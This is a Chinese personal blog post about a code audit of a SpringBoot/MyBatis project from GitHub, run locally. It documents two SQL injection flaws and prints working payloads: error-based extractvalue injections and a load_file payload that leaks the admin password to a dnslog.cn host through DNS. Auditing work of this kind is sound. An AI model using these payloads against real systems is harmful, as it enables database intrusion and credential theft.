<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="utf-8">
  

  
  <title>某个SpringBoot项目的审计 | 闪电&#39;s Blog</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  
  
  
  <meta name="description" content="某个SpringBoot项目的审计在github上看到的这个SpringBoot项目，作者刚提交不久，一些功能还没完善。好奇心让我下载了这个项目，打算在本地审计一波，遂有了此文。 拿到一个java的项目，我习惯先看是什么框架。持久层用的什么，然后是maven项目的话，pom文件里的依赖都是哪些，版本又是如何。再就是看项目里filter对参数的过滤情况。 注入 第一处注入  项目的持久层用的myba">
<meta property="og:type" content="article">
<meta property="og:title" content="某个SpringBoot项目的审计">
<meta property="og:url" content="http://yoursite.com/2021/06/05/某个SpringBoot系统的审计/index.html">
<meta property="og:site_name" content="闪电&#39;s Blog">
<meta property="og:description" content="某个SpringBoot项目的审计在github上看到的这个SpringBoot项目，作者刚提交不久，一些功能还没完善。好奇心让我下载了这个项目，打算在本地审计一波，遂有了此文。 拿到一个java的项目，我习惯先看是什么框架。持久层用的什么，然后是maven项目的话，pom文件里的依赖都是哪些，版本又是如何。再就是看项目里filter对参数的过滤情况。 注入 第一处注入  项目的持久层用的myba">
<meta property="og:locale" content="en">
<meta property="og:image" content="d:%5CDesktop%5C%E6%88%91%E7%9A%84%E7%AC%94%E8%AE%B0%5C%E6%97%A5%E5%B8%B8%E8%AE%B0%E5%BD%95%5C%E6%9F%90%E4%B8%AASpringBoot%E9%A1%B9%E7%9B%AE%E7%9A%84%E5%AE%A1%E8%AE%A1%5Cimage-20210614131759313.png">
<meta property="og:image" content="d:%5CDesktop%5C%E6%88%91%E7%9A%84%E7%AC%94%E8%AE%B0%5C%E6%97%A5%E5%B8%B8%E8%AE%B0%E5%BD%95%5C%E6%9F%90%E4%B8%AASpringBoot%E9%A1%B9%E7%9B%AE%E7%9A%84%E5%AE%A1%E8%AE%A1%5Cimage-20210614132523077.png">
<meta property="og:image" content="d:%5CDesktop%5C%E6%88%91%E7%9A%84%E7%AC%94%E8%AE%B0%5C%E6%97%A5%E5%B8%B8%E8%AE%B0%E5%BD%95%5C%E6%9F%90%E4%B8%AASpringBoot%E9%A1%B9%E7%9B%AE%E7%9A%84%E5%AE%A1%E8%AE%A1%5Cimage-20210614132822231.png">
<meta property="og:image" content="d:%5CDesktop%5C%E6%88%91%E7%9A%84%E7%AC%94%E8%AE%B0%5C%E6%97%A5%E5%B8%B8%E8%AE%B0%E5%BD%95%5C%E6%9F%90%E4%B8%AASpringBoot%E9%A1%B9%E7%9B%AE%E7%9A%84%E5%AE%A1%E8%AE%A1%5Cimage-20210614133459925.png">
<meta property="og:image" content="d:%5CDesktop%5C%E6%88%91%E7%9A%84%E7%AC%94%E8%AE%B0%5C%E6%97%A5%E5%B8%B8%E8%AE%B0%E5%BD%95%5C%E6%9F%90%E4%B8%AASpringBoot%E9%A1%B9%E7%9B%AE%E7%9A%84%E5%AE%A1%E8%AE%A1%5Cimage-20210614133554737.png">
<meta property="og:image" content="d:%5CDesktop%5C%E6%88%91%E7%9A%84%E7%AC%94%E8%AE%B0%5C%E6%97%A5%E5%B8%B8%E8%AE%B0%E5%BD%95%5C%E6%9F%90%E4%B8%AASpringBoot%E9%A1%B9%E7%9B%AE%E7%9A%84%E5%AE%A1%E8%AE%A1%5Cimage-20210614133917547.png">
<meta property="og:image" content="d:%5CDesktop%5C%E6%88%91%E7%9A%84%E7%AC%94%E8%AE%B0%5C%E6%97%A5%E5%B8%B8%E8%AE%B0%E5%BD%95%5C%E6%9F%90%E4%B8%AASpringBoot%E9%A1%B9%E7%9B%AE%E7%9A%84%E5%AE%A1%E8%AE%A1%5Cimage-20210614134001374.png">
<meta property="og:image" content="d:%5CDesktop%5C%E6%88%91%E7%9A%84%E7%AC%94%E8%AE%B0%5C%E6%97%A5%E5%B8%B8%E8%AE%B0%E5%BD%95%5C%E6%9F%90%E4%B8%AASpringBoot%E9%A1%B9%E7%9B%AE%E7%9A%84%E5%AE%A1%E8%AE%A1%5Cimage-20210614195231427.png">
<meta property="og:image" content="d:%5CDesktop%5C%E6%88%91%E7%9A%84%E7%AC%94%E8%AE%B0%5C%E6%97%A5%E5%B8%B8%E8%AE%B0%E5%BD%95%5C%E6%9F%90%E4%B8%AASpringBoot%E9%A1%B9%E7%9B%AE%E7%9A%84%E5%AE%A1%E8%AE%A1%5Cimage-20210614195501756.png">
<meta property="og:image" content="d:%5CDesktop%5C%E6%88%91%E7%9A%84%E7%AC%94%E8%AE%B0%5C%E6%97%A5%E5%B8%B8%E8%AE%B0%E5%BD%95%5C%E6%9F%90%E4%B8%AASpringBoot%E9%A1%B9%E7%9B%AE%E7%9A%84%E5%AE%A1%E8%AE%A1%5Cimage-20210614195539485.png">
<meta property="og:image" content="d:%5CDesktop%5C%E6%88%91%E7%9A%84%E7%AC%94%E8%AE%B0%5C%E6%97%A5%E5%B8%B8%E8%AE%B0%E5%BD%95%5C%E6%9F%90%E4%B8%AASpringBoot%E9%A1%B9%E7%9B%AE%E7%9A%84%E5%AE%A1%E8%AE%A1%5Cimage-20210614195420133.png">
<meta property="og:image" content="d:%5CDesktop%5C%E6%88%91%E7%9A%84%E7%AC%94%E8%AE%B0%5C%E6%97%A5%E5%B8%B8%E8%AE%B0%E5%BD%95%5C%E6%9F%90%E4%B8%AASpringBoot%E9%A1%B9%E7%9B%AE%E7%9A%84%E5%AE%A1%E8%AE%A1%5Cimage-20210614195827125.png">
<meta property="og:image" content="d:%5CDesktop%5C%E6%88%91%E7%9A%84%E7%AC%94%E8%AE%B0%5C%E6%97%A5%E5%B8%B8%E8%AE%B0%E5%BD%95%5C%E6%9F%90%E4%B8%AASpringBoot%E9%A1%B9%E7%9B%AE%E7%9A%84%E5%AE%A1%E8%AE%A1%5Cimage-20210614200012714.png">
<meta property="og:updated_time" content="2021-06-19T12:47:42.277Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="某个SpringBoot项目的审计">
<meta name="twitter:description" content="某个SpringBoot项目的审计在github上看到的这个SpringBoot项目，作者刚提交不久，一些功能还没完善。好奇心让我下载了这个项目，打算在本地审计一波，遂有了此文。 拿到一个java的项目，我习惯先看是什么框架。持久层用的什么，然后是maven项目的话，pom文件里的依赖都是哪些，版本又是如何。再就是看项目里filter对参数的过滤情况。 注入 第一处注入  项目的持久层用的myba">
<meta name="twitter:image" content="d:%5CDesktop%5C%E6%88%91%E7%9A%84%E7%AC%94%E8%AE%B0%5C%E6%97%A5%E5%B8%B8%E8%AE%B0%E5%BD%95%5C%E6%9F%90%E4%B8%AASpringBoot%E9%A1%B9%E7%9B%AE%E7%9A%84%E5%AE%A1%E8%AE%A1%5Cimage-20210614131759313.png">
  
    <link rel="alternate" href="/atom.xml" title="闪电&#39;s Blog" type="application/atom+xml">
  
  
    <link rel="icon" href="/images/default-avatar.jpg">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  <link rel="stylesheet" href="/css/style.css">
  <link rel="stylesheet" href="/css/highlight.css">
</head>
</html>
<body>
  <div id="fullpage" class="mobile-nav-right">
    
      <div id="wrapper" title="图片来自网络">
    
    
      <header id="header">
  <div id="nav-toggle" class="nav-toggle"></div>
  <div class="head-box global-width">
    <nav class="nav-box nav-right">
      
        <a class="nav-item" href="/" title
        
        >首页</a>
      
        <a class="nav-item" href="/archives" title
        
        >归档</a>
      
    </nav>
  </div>
</header>
      <div id="middlecontent" title class="global-width sidebar-right">
        <section id="main"><article id="post-某个SpringBoot系统的审计" class="article global-container article-type-post" itemscope itemprop="blogPost">
  
    <header class="article-header">
      
  
    <h1 class="article-title" itemprop="name">
      某个SpringBoot项目的审计
    </h1>
  

    </header>
  
  <div class="article-meta">
    <a href="/2021/06/05/某个SpringBoot系统的审计/" class="article-date">
  <time datetime="2021-06-05T03:10:39.000Z" itemprop="datePublished">2021-06-05</time>
</a>
    
  <div class="article-category">
    <a class="article-category-link" href="/categories/WEB相关/">WEB相关</a>
  </div>

    
  </div>
  
    <span id="busuanzi_container_page_pv">
      本文总阅读量<span id="busuanzi_value_page_pv"></span>次
    </span>
  

  <div class="article-inner">
    
    <div class="article-content article-content-cloud" itemprop="articleBody">
      
        <h1 id="某个SpringBoot项目的审计"><a href="#某个SpringBoot项目的审计" class="headerlink" title="某个SpringBoot项目的审计"></a>某个SpringBoot项目的审计</h1><p>在github上看到的这个SpringBoot项目，作者刚提交不久，一些功能还没完善。好奇心让我下载了这个项目，打算在本地审计一波，遂有了此文。</p>
<p>拿到一个java的项目，我习惯先看是什么框架。持久层用的什么，然后是maven项目的话，pom文件里的依赖都是哪些，版本又是如何。再就是看项目里filter对参数的过滤情况。</p>
<h3 id="注入"><a href="#注入" class="headerlink" title="注入"></a>注入</h3><ul>
<li>第一处注入</li>
</ul>
<p>项目的持久层用的mybatis，这里我就直接查看项目里的sql映射文件，看到这一处sql语句，${sql}完全可控，明显一处注入</p>
<p><img src="D:%5CDesktop%5C%E6%88%91%E7%9A%84%E7%AC%94%E8%AE%B0%5C%E6%97%A5%E5%B8%B8%E8%AE%B0%E5%BD%95%5C%E6%9F%90%E4%B8%AASpringBoot%E9%A1%B9%E7%9B%AE%E7%9A%84%E5%AE%A1%E8%AE%A1%5Cimage-20210614131759313.png" alt="image-20210614131759313"></p>
<p>一路跟上去看看有没有调用的</p>
<p>，<img src="D:%5CDesktop%5C%E6%88%91%E7%9A%84%E7%AC%94%E8%AE%B0%5C%E6%97%A5%E5%B8%B8%E8%AE%B0%E5%BD%95%5C%E6%9F%90%E4%B8%AASpringBoot%E9%A1%B9%E7%9B%AE%E7%9A%84%E5%AE%A1%E8%AE%A1%5Cimage-20210614132523077.png" alt="image-20210614132523077"></p>
<p><img src="D:%5CDesktop%5C%E6%88%91%E7%9A%84%E7%AC%94%E8%AE%B0%5C%E6%97%A5%E5%B8%B8%E8%AE%B0%E5%BD%95%5C%E6%9F%90%E4%B8%AASpringBoot%E9%A1%B9%E7%9B%AE%E7%9A%84%E5%AE%A1%E8%AE%A1%5Cimage-20210614132822231.png" alt="image-20210614132822231"></p>
<p>可惜的是，作者唯独没调用这个getAreaBySql，应该是项目还没完善吧。为了验证一下这里的问题，我在controller里自己加了一处调用该函数。</p>
<div class="highlight-box"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">@PostMapping(&quot;/getAreaBySql&quot;)</span><br><span class="line">public RespDto&lt;List&lt;AreaReturnDto&gt;&gt;  getArea(@RequestParam(&quot;sql&quot;)String sql)&#123;</span><br><span class="line">	List&lt;AreaReturnDto&gt; list=areaService.getAreaBySql(sql);</span><br><span class="line">	return RespDto.succResult(list);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<p>小小的尝试</p>
<div class="highlight-box"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">payload</span><br><span class="line">sql=(select 1  and extractvalue(1,concat(0x7e,user())))</span><br></pre></td></tr></table></figure></div>

<p><img src="D:%5CDesktop%5C%E6%88%91%E7%9A%84%E7%AC%94%E8%AE%B0%5C%E6%97%A5%E5%B8%B8%E8%AE%B0%E5%BD%95%5C%E6%9F%90%E4%B8%AASpringBoot%E9%A1%B9%E7%9B%AE%E7%9A%84%E5%AE%A1%E8%AE%A1%5Cimage-20210614133459925.png" alt="image-20210614133459925"></p>
<p>拿到结果，不过这里需要在控制台里才能看到结果，实战中应尝试dnslog拿结果，前提是对方的mysql secure_file_priv不为null，有load_file的权限</p>
<p><img src="D:%5CDesktop%5C%E6%88%91%E7%9A%84%E7%AC%94%E8%AE%B0%5C%E6%97%A5%E5%B8%B8%E8%AE%B0%E5%BD%95%5C%E6%9F%90%E4%B8%AASpringBoot%E9%A1%B9%E7%9B%AE%E7%9A%84%E5%AE%A1%E8%AE%A1%5Cimage-20210614133554737.png" alt="image-20210614133554737"></p>
<div class="highlight-box"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">dnslog payload</span><br><span class="line">sql=(select load_file(concat(&apos;\\\\&apos;,(select password from sys_member_info where user_name=&apos;admin&apos;),&apos;.4i06oo.dnslog.cn\\test&apos;)))</span><br></pre></td></tr></table></figure></div>

<p><img src="D:%5CDesktop%5C%E6%88%91%E7%9A%84%E7%AC%94%E8%AE%B0%5C%E6%97%A5%E5%B8%B8%E8%AE%B0%E5%BD%95%5C%E6%9F%90%E4%B8%AASpringBoot%E9%A1%B9%E7%9B%AE%E7%9A%84%E5%AE%A1%E8%AE%A1%5Cimage-20210614133917547.png" alt="image-20210614133917547"></p>
<p>拿到结果</p>
<p><img src="D:%5CDesktop%5C%E6%88%91%E7%9A%84%E7%AC%94%E8%AE%B0%5C%E6%97%A5%E5%B8%B8%E8%AE%B0%E5%BD%95%5C%E6%9F%90%E4%B8%AASpringBoot%E9%A1%B9%E7%9B%AE%E7%9A%84%E5%AE%A1%E8%AE%A1%5Cimage-20210614134001374.png" alt="image-20210614134001374"></p>
<ul>
<li><p>第二处注入</p>
<p>这两个参数任选其一即可</p>
<p><img src="D:%5CDesktop%5C%E6%88%91%E7%9A%84%E7%AC%94%E8%AE%B0%5C%E6%97%A5%E5%B8%B8%E8%AE%B0%E5%BD%95%5C%E6%9F%90%E4%B8%AASpringBoot%E9%A1%B9%E7%9B%AE%E7%9A%84%E5%AE%A1%E8%AE%A1%5Cimage-20210614195231427.png" alt="image-20210614195231427"></p>
<p>看看哪里调用了</p>
<p><img src="D:%5CDesktop%5C%E6%88%91%E7%9A%84%E7%AC%94%E8%AE%B0%5C%E6%97%A5%E5%B8%B8%E8%AE%B0%E5%BD%95%5C%E6%9F%90%E4%B8%AASpringBoot%E9%A1%B9%E7%9B%AE%E7%9A%84%E5%AE%A1%E8%AE%A1%5Cimage-20210614195501756.png" alt="image-20210614195501756"></p>
<p><img src="D:%5CDesktop%5C%E6%88%91%E7%9A%84%E7%AC%94%E8%AE%B0%5C%E6%97%A5%E5%B8%B8%E8%AE%B0%E5%BD%95%5C%E6%9F%90%E4%B8%AASpringBoot%E9%A1%B9%E7%9B%AE%E7%9A%84%E5%AE%A1%E8%AE%A1%5Cimage-20210614195539485.png" alt="image-20210614195539485"></p>
</li>
</ul>
<p>  <img src="D:%5CDesktop%5C%E6%88%91%E7%9A%84%E7%AC%94%E8%AE%B0%5C%E6%97%A5%E5%B8%B8%E8%AE%B0%E5%BD%95%5C%E6%9F%90%E4%B8%AASpringBoot%E9%A1%B9%E7%9B%AE%E7%9A%84%E5%AE%A1%E8%AE%A1%5Cimage-20210614195420133.png" alt="image-20210614195420133"></p>
<p>找到调用的，直接开干，这里需要注意传的数据要是json的，不然得不到结果，也就是下面的enctype那里</p>
<div class="highlight-box"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">payload</span><br><span class="line">http://localhost:8888/chongzhilog/list</span><br><span class="line">&#123;&quot;page&quot;:1,&quot;limit&quot;:10,&quot;id&quot;:&quot;1&quot;,&quot;startTime&quot;:&quot;1&apos;,&apos;2&apos;,&apos;00:00:00&apos;) and extractvalue(1,concat(0x7e,user()))--+&quot;&#125;</span><br></pre></td></tr></table></figure></div>

<p><img src="D:%5CDesktop%5C%E6%88%91%E7%9A%84%E7%AC%94%E8%AE%B0%5C%E6%97%A5%E5%B8%B8%E8%AE%B0%E5%BD%95%5C%E6%9F%90%E4%B8%AASpringBoot%E9%A1%B9%E7%9B%AE%E7%9A%84%E5%AE%A1%E8%AE%A1%5Cimage-20210614195827125.png" alt="image-20210614195827125"></p>
<p>得到结果</p>
<p><img src="D:%5CDesktop%5C%E6%88%91%E7%9A%84%E7%AC%94%E8%AE%B0%5C%E6%97%A5%E5%B8%B8%E8%AE%B0%E5%BD%95%5C%E6%9F%90%E4%B8%AASpringBoot%E9%A1%B9%E7%9B%AE%E7%9A%84%E5%AE%A1%E8%AE%A1%5Cimage-20210614200012714.png" alt="image-20210614200012714"></p>
<p>同样的可以尝试用dnslog拿到结果</p>

      
    </div>
    
      <footer class="article-footer">
        完
      </footer>
    
  </div>
  
    
<nav id="article-nav">
  <div class="article-nav-block">
    
  </div>
  <div class="article-nav-block">
    
      <a href="/2019/11/03/操作系统概述/" id="article-nav-older" class="article-nav-link-wrap">
        <div class="article-nav-title">操作系统概述</div>
        <strong class="article-nav-caption"></strong>
      </a>
    
  </div>
</nav>

    <link rel="stylesheet" href="/css/gitment.css"> 
<script src="/js/gitment.js"></script>

<div id="gitmentContainer"></div>

<script>
var gitment = new Gitment({
  owner: '',
  repo: '',
  oauth: {
    client_id: '',
    client_secret: '',
  },
})
gitment.render('gitmentContainer')
</script>

  
  
</article>
</section>
        <aside id="sidebar">
  
    <div class="widget-box">
  <div class="avatar-box">
    <img class="avatar" src="/images/default-avatar.jpg" title="图片来自网络"></img>
    <h3 class="avatar-name">
      
        闪电啊哈哈
      
    </h3>
    <p class="avatar-slogan">
      何必管一片海，有多澎湃
    </p>
  </div>
</div>


  
    
  <div class="widget-box">
    <h3 class="widget-title">Categories</h3>
    <div class="widget">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/WEB相关/">WEB相关</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/无线渗透/">无线渗透</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/杂记/">杂记</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/漏洞复现/">漏洞复现</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/网络工程/">网络工程</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/计算机操作系统/">计算机操作系统</a></li></ul>
    </div>
  </div>


  
    

  
    
  
    
  <div class="widget-box">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/06/">June 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/11/">November 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/10/">October 2019</a></li></ul>
    </div>
  </div>

  
    
  <div class="widget-box">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2021/06/05/某个SpringBoot系统的审计/">某个SpringBoot项目的审计</a>
          </li>
        
          <li>
            <a href="/2019/11/03/操作系统概述/">操作系统概述</a>
          </li>
        
          <li>
            <a href="/2019/10/30/关于php反序列化漏洞小记/">关于php反序列化漏洞小记</a>
          </li>
        
          <li>
            <a href="/2019/10/24/CVE-2019-11043-复现/">CVE-2019-11043 复现</a>
          </li>
        
          <li>
            <a href="/2019/10/23/WiFi网络结构/">WiFi网络结构</a>
          </li>
        
      </ul>
    </div>
  </div>

  
      <div class="widget-box">
    <h3 class="widget-title">友链</h3>
    <div class="widget">
      
    </div>
  </div>

  
</aside>
      </div>
      <footer id="footer">
  <div class="foot-box global-width">
    &copy; 2021 闪电 &nbsp;&nbsp;
    Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    &nbsp;|&nbsp;主题 <a href="https://github.com/yiluyanxia/hexo-theme-antiquity">antiquity</a>
    <br>
    <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span id="busuanzi_container_site_pv">不蒜子告之   阁下是第<span id="busuanzi_value_site_pv"></span>个访客</span>
  </div>
</footer>
      <script src="https://code.jquery.com/jquery-2.0.3.min.js"></script>
<script>
if (!window.jQuery) {
var script = document.createElement('script');
script.src = "/js/jquery-2.0.3.min.js";
document.body.write(script);
}
</script>

  <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  <script src="/fancybox/jquery.fancybox.pack.js"></script>


<script src="/js/script.js"></script>



    </div>
    <nav id="mobile-nav" class="mobile-nav-box">
  <div class="mobile-nav-img mobile-nav-top"></div>
  
    <a href="/" class="mobile-nav-link">首页</a>
  
    <a href="/archives" class="mobile-nav-link">归档</a>
  
  <div class="mobile-nav-img  mobile-nav-bottom"></div>
</nav>    
  </div>
</body>
</html>